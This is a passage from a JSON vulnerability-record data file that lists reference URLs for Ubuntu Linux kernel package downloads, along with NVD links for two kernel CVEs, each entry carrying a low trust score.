        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4141"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0006"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
